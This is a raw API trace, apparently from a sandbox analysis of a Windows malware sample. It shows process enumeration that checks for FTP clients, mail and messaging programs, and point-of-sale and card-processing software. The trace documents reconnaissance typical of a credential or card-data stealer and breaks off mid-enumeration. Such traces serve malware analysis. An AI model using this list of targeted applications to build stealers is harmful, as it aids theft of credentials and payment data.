th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0257.149] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0257.245] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0257.248] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0257.249] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0257.250] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0257.252] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0257.253] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0257.255] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0257.257] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0257.259] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0257.260] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0257.262] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0257.264] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0257.266] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0257.267] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0257.269] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0257.271] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0257.273] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0257.275] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0257.375] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0257.377] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0257.379] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0257.381] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0257.383] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0257.388] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0257.390] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0257.393] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0257.395] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0257.397] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0257.399] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0257.403] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0257.406] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0257.410] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0257.413] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0257.415] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0257.518] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0257.520] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0257.521] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0257.523] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0257.525] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0257.527] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0257.529] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0257.530] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0257.532] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0257.533] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0257.535] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0257.536] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0257.538] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0257.539] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0257.541] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0257.544] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0257.545] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0257.546] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0257.548] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0257.549] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0257.551] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0257.552] CloseHandle (hObject=0x1018) returned 1 [0257.552] Sleep (dwMilliseconds=0x64) [0257.756] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0257.768] Process32First (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0257.769] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0257.770] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0257.772] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0257.773] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0257.774] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0257.776] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0257.777] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0257.779] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0257.781] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.782] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.784] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0257.785] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.786] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.788] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.789] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.790] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.931] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.940] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.948] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0257.955] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0257.962] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0257.969] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.976] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0258.060] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0258.061] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0258.063] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0258.064] 